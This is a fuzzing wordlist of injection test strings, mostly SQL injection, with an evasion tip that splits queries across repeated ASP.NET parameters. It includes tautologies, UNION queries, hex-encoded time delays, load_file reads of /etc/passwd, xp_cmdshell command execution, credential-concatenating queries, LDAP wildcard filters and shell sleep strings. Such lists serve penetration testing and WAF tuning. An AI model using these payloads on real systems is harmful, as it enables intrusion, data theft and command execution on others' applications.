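The document is a cross-platform fuzzing wordlist of injection test strings. Most are SQL injection payloads, alongside a few LDAP filter and shell command strings. It includes SQL keywords and statement fragments, boolean tautologies, comment-based obfuscation, and URL- and hex-encoded variants, which are used to test how an application and any web application firewall (WAF) or IDS in front of it handle hostile input. The vulnerabilities these strings probe lie in how the application builds its queries from input, not in the database engine itself. The content serves as a reference for security testing and for understanding the attack inputs a web application must handle safely.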
Xplatform Fuzz
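# To test IDS/WAF evasion, try splitting the query across repeated parameters, e.g.
# /index.aspx?page=select 1&page=2,3 from table where id=1
# (ASP.NET joins repeated parameter values with commas, so a filter has to inspect the combined value, not each part on its own.)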
<>"'%;)(&+ | ! ? / // //* ' ' -- ( ) *| */* & 0 031003000270000 0 or 1=1 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR as asc a' waitfor delay '0:0:10'-- '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003 000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp '; exec xp_regread ' group by userid having 1=1-- handler having ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a 
hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 -- ' or 2 > 1 ' or 2 between 1 and 3 ' or 3=3 ‘ or 3=3 -- ' or '7659'='7659 or a=a or a = a ' or 'a'='a ' or a=a-- ') or ('a'='a " or "a"="a ) or (a=a order by ' or (EXISTS) or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or uid like '% ' or uname like '% ' or 'unusual' = 'unusual' ' or userid like '% ' or user like '% ' or username like '% ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- PRINT PRINT @@variable procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- ' (select top 1 --sp_password 'sqlattempt1 (sqlattempt2) 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset ' UNION ALL SELECT ' union all select @@version-- ' union select uni/**/on sel/**/ect ' UNION SELECT ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update '||UTL_HTTP.REQUEST ,@variable @variable @var select @var as var into temp end -- \x27UNION SELECT x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' or 1=1 or 'x'='y x' OR full_name LIKE '%Bob% ý or 1=1 --